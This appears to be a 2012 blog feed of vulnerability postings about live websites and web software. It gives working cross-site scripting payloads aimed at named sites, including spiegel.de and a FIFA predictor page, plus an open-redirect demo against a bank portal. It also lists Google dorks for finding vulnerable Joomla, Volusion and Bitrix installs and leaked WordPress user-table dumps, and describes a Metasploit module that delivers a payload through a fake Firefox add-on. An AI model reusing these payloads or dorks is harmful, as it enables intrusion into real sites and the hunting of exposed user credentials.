Friday, 11. May 2012
security.anti-abuse.com - xss
On Friday, 11. May 2012 in topic 'Vulnerabilities'
Tuesday, 24. April 2012
spiegel.de - XSS
On Tuesday, 24. Apr 2012 in topic 'Vulnerabilities'
URL: http://www.spiegel.de/artikelversand/online/a-823270-de.html
POST: f.emailempfang=alert(navigator.userAgent)
by
watt
Thursday, 12. April 2012
joomla (com_estateagent) - SQL
On Thursday, 12. Apr 2012 in topic 'Vulnerabilities'
Exploit Title: joomla component (com_estateagent) SQL injection Vulnerability
Date: 10/04/2012
Author: xDarkSton3x
Category: webapps
Google dork: inurl:"com_estateagent"
Metasploit & Firefox Fake Extension (XPI)
On Thursday, 12. Apr 2012 in topic 'Vulnerabilities'
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
Sunday, 1. April 2012
fifa - XSS
On Sunday, 1. Apr 2012 in topic 'Vulnerabilities'
Domain:
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E
by
TurKPoweR
Monday, 26. March 2012
vBulletin 4.1.10 - XSS
On Monday, 26. Mar 2012 in topic 'Vulnerabilities'
Friday, 23. March 2012
Various Banks - XSS
On Friday, 23. Mar 2012 in topic 'Vulnerabilities'
Demo:
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://xxxxx.com
Google Dork:
inurl:bitrix/rk.php
by
Sony and Flexxpoint
Tuesday, 20. March 2012
Microsoft - XSS
On Tuesday, 20. Mar 2012 in topic 'Vulnerabilities'
Saturday, 17. March 2012
WordPress - SQL
On Saturday, 17. Mar 2012 in topic 'Vulnerabilities'
Dork:
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql
Thursday, 15. March 2012
Volusion Chat - XSS
On Thursday, 15. Mar 2012 in topic 'Vulnerabilities'
Software Link:
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion
by
Sony